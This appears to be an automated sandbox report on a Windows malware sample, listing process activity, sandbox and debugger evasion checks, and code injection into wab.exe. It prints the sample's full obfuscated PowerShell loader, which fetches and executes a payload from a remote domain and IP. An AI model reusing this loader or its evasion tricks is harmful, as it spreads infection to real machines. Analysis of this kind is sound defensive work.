Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 54446C1

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6017	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3760	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6217	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3527	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3124	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2545	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3493	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 6416	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6156	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep count: 6217 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep count: 3527 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3796	Thread sleep count: 3124 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep count: 2545 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep time: -7635000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep count: 3493 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep time: -10479000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 3124 delay: -5

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 00000000.00000003.1679476616.000001816A4E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1679903004.000001816A4F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceStoppedOKvmicguestinterfacevmicguestinterfaceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceHyper-V Guest Service InterfaceWin32_ServiceWin32_ComputerSystemuser-PCvmicguestinterfaceLMEM@
Source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: powershell.exe, 00000001.00000002.2496319652.000001703AE17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000003.1679207996.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682876301.000001816A468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657076648.000001816A441000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682876301.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656487203.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656928856.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679947682.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679947682.000001816A467000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1683906838.000001816A51F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679136591.000001816A504000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680099067.000001816A51E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: icshutdownHyper-V Ti*v
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
Source: wscript.exe, 00000000.00000002.1683801671.000001816A4FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: desktop virtualization servicevmicshutdownhyper-v time synchronization servicehyper-v powershell direct servicevmicvssvolume shadow copywindows timewalletservicewarpjitsvcblock level backup engine servicewindows biometric servicewindows connection managerwindows connect now - config registrardiagnostic service hostdiagnostic system hostmicrosoft defender antivirus network inspection servicewebclientwindows event collectorwindows encryption provider host serviceproblem reports control panel supportwindows error reporting servicewi-fi direct services connection manager servicestill image acquisition eventsmicrosoft defender antivirus servicewinhttp web proxy auto-discovery servicewindows management instrumentationwindows remote management (ws-management)windows insider servicewlan autoconfigmicrosoft account sign-in assistantlocal profile assistant servicewindows management servicewmi performance adapterwindows media player network sharing servicework foldersparental controlsportable device enumerator servicewindows push notifications system servicesecurity centerwindows searchwindows updatewwan autoconfigxbox live auth managerxbox live game savexbox accessory management servicexbox live networking serviceagent activation runtime_26d39gamedvr and broadcast user service_26d39bluetooth user support service_26d39captureservice_26d39clipboard user service_26d39connected devices platform user service_26d39consentux_26d39credentialenrollmentmanagerusersvc_26d39deviceassociationbroker_26d39devicepicker_26d39devicesflow_26d39messagingservice_26d39sync host_26d39contact data_26d39printworkflow_26d39udk user service_26d39user data storage_26d39user data access_26d39windows push notifications user service_26d393
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_4412.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 275F89C			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe 